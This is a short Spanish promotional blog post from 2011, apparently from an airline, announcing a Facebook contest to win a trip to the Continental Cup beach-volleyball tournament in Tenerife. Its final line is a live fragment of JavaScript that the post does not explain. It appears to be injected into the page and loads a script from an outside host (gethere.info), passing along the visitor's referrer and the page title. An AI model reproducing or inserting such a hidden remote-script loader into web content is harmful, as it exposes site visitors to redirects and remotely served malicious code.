¿Os gustaría asistir al Continental Cup Islas Canarias?

20/09/2011

¿Os gusta la combinación deporte y playa? Si vuestra respuesta es sí a las dos preguntas, habéis llegado a vuestro sitio porque nuestra propuesta os gustará: ¡inauguramos concurso! ;-).

Del 30 de septiembre al 2 de octubre se celebra en la Continental Cup Islas Canarias, un  Torneo Preolímpico de Beach Volley en Playa Fañabé, en Adeje, Tenerife. ¿Os imagináis mejor entorno para disputar la Gran Final y puerta de acceso a los Juegos Olímpicos de Londres 2012? 12 Selecciones Nacionales, entre ellas las españolas masculina y femenina, participarán en la competición. ¿Os gustaría asistir a animarles y disfrutar de la belleza de la isla? Para ello, solo tenéis que acceder al siguiente link en nuestra página en Facebook y responder a la siguiente pregunta:

Busca en www.iberia.com el nº de vuelo operado por Iberia que podría llevarte hasta Tenerife y cuéntanos además, ¿con quién disfrutarías el premio y con qué mensaje se lo comunicarías? ¡Queremos que seáis originales y creativos!

De entre las 10 propuestas más votadas, seleccionaremos la más original que podrá ganar 2 billetes de i/v para dos personas con estancia incluida de una noche en un hotel de lujo y dos entradas VIP para disfrutar del campeonato.

No lo podéis negar,  ¿hay mejor forma de despedir el verano que en la playa? ;-).

Tenéis hasta el viernes 23 de septiembre para participar.

Podéis consultar las bases completas del concurso aquí.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;